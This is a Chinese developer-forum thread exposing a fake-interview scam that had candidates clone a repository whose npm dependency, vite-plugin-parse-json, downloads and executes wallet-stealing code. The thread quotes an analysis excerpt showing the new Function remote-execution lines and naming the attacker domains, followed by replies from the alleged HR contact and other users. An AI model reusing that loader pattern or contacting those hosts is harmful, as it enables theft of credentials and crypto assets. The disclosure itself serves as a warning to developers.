https://eleduck.com/posts/0XfvKQ
就是这个帖子
手段是通过提供薪资高的离谱的招聘信息,借用了一个很大的元宇宙平台 upland 的名头,引导面试者去做他们的面试题
开始面试时,会有一个英语很蹩脚的面试官要求你 clone 一个仓库,做一道完全不符合这个 jd 技能要求简单的离谱的编程题
然后恭喜,当运行仓库的一瞬间,恶意代码就被运行了。
请管理员做出相应的举措
也请大家吸取我的教训,遇到类似模式的面试一定要万分注意,今天可以是加密货币,理论上也可以是其他方面的隐私信息。
这个恶意代码还伪装的十分深,让 ai 光扫描项目本身的代码,没有任何问题,出问题的库也是一个叫做 vite-plugin-parse-json 的库,看起来人畜无害的
但是里面藏着一些自动从一个服务器下载恶意程序的代码
下面是 ai 扫描 node modules 的结果:
🚨 发现恶意代码!这确实是一个钓鱼面试骗局!
我找到了导致您钱包被盗的恶意代码!在 vite-plugin-parse-json 包中发现了明显的恶意代码:
🔥 恶意代码分析
位置: /node_modules/vite-plugin-parse-json/lib/private/prepare-chunk.js
恶意行为:
-
第34行: new Function("require", response.data.model)(require);
-
第41行: new Function("require", e.response.data.model)(require);
这些代码会:
-
连接到恶意服务器获取JavaScript代码
-
使用 new Function() 执行远程获取的任意代码
-
通过 require 访问系统资源
恶意域名:
-
api.npoint.io (第21行组合而成)
-
json-project-opal.vercel.app (第20行)
🎯 攻击流程分析
-
伪装面试: 攻击者通过Google Meet伪装成招聘人员
-
恶意仓库: 提供包含恶意npm包的"面试项目"
-
自动执行: 当您运行 yarn install 或 yarn dev 时:
-
vite-plugin-parse-json 被加载
-
prepare-chunk.js 中的恶意代码自动执行
-
代码连接到攻击者服务器下载钱包窃取脚本
-
钱包扫描: 恶意脚本扫描您的浏览器扩展、本地文件寻找钱包私钥
-
资产盗取: 将发现的私钥发送给攻击者
⚠️ 这是典型的供应链攻击
vite-plugin-parse-json 包的问题:
-
正常的Vite插件不需要 axios、sqlite3 等依赖
-
包含明显的代码混淆和恶意网络请求
-
使用 new Function() 执行远程代码是典型的恶意行为
你好,我是相关招聘的HR,我的职责是帮公司过滤合适的面试者,所以对你提出的代码问题我并不能完全理解其中的利害关系。
但尊重你的需求,我已经向公司提出你提出的问题,且暂停了招聘信息的发布,等待公司的具体回复,我会再次对此岗位进行修改。
至于你觉得此次招聘是针对广大开发的一次恶性欺诈,在未得到明确回复之前,我无法给你一个准确回答,但确实有拿着对应薪资的员工入职我发布所在的公司。这是已存在的既定事实,所以不存在你所谓的通过提供薪资高的离谱的招聘信息对大家进行一个欺骗。
目前我正在等待公司的回复中,有消息了我会作出声明,抱歉给您造成的困扰。也希望你理解,遇到这样的事情,也是我HR生涯中的唯一一例,我会尽量处理好。
这个就是所谓的贵公司吗?只有一个昨天才刚刚创建的,包含了恶意代码依赖的一个 react 项目。看起来是针对受邀面试者单独创建的。
https://github.com/Upland-company
有可能是面试官的个人行为,这个我已经向上反馈了,有结果会在这里和邮箱进行回复
不如贴一下你反馈的邮件截图,以及可以证明你相关资质的证件,否则你只会被认定为恶意诈骗的帮凶。
请查看邮箱
我帮你贴过来,让大家来看看这个够不够说服力吧😆
我已经停止了招聘信息 我发送你邮箱的目的就是不想结果还没出来的时候公开这些内容 不知道你把这个图贴在这里的意义是什么。 这让我觉得有些被冒犯,首先我并没有回避这件事情,其次我正在想办法了解事情的真相,不明白你这么做的意义是什么。
感谢你的详细曝光,已封禁。已三连!
一个js脚本,有这么大的权限吗?还能盗钱包?
脚本从一个vercel服务器上下载的,具体是怎么执行的我就不知道了。
手动顶
这样的事情已经遇到过 2 次了,一次是在电鸭一次是在 v2ex。只能说后续需要动手写代码的面试都要注意,特别是那些需要你 clone 某些库的更加是要注意。
顶
既然这个恶意招聘的发帖者仍然在这个帖子里自辨,只有两种可能
https://github.com/Upland-company/test/blob/main/package.json
截图留证,不过大家可不要尝试运行这个恶意代码哦